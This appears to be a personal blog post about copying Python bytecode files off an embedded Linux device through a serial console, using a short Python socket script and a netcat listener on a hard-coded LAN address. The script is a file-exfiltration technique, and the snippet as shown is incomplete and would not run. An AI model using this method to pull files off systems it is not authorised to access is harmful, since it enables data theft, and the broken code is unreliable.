From the "in case I need to do this again" archives
So recently I got access to an embedded linux system via soldered on serial cable, and on this system there were a bunch of compiled python bytecode files that I really wanted to look and while it had network access there were a couple of hurdles to get over.
- It was running a really old version of busybox that was lacking all of the tools that would make this easy. (no netcat, no scp, no ftp client, no tftp client)
- Very limited space, so statically compiling binaries and attempting to copy them across was going to be touch and go.
- Nothing on the device would let me do any analysis without first moving the files of the box.
After digging around the only thing I found was python and a handful of libraries, so I knew we were good :)
Given I have no idea if any of these files have nulls in them, the best bet was to base64 those bad boys then spit them out onto the wire, this means I don't have to worry about truncating any transfers or filling up the couple of meg I have on the storage.
Boom, quick and dirty python 5 liner.
import sys, base64, socket
input = open(sys.argv).read()
s = socket.socket()
s.connect( ("192.168.0.99", 1900) )
Set up your netcat listener on the address specified.
nc -l 1900 | base64 -d > somefile
and call your script.
Robert's a good friend of your aunt.
Yes, yes as with all my code this can be improved upon, but I think you're missing the point: Backed into the corner, quick and dirty.*
I was lucky this time that python was installed, going to look at other ways to exfil data with naff all tools. If you have any suggestion drop me a line.
* Coincidentally this just how your mum likes it.**
*** Possibly a lie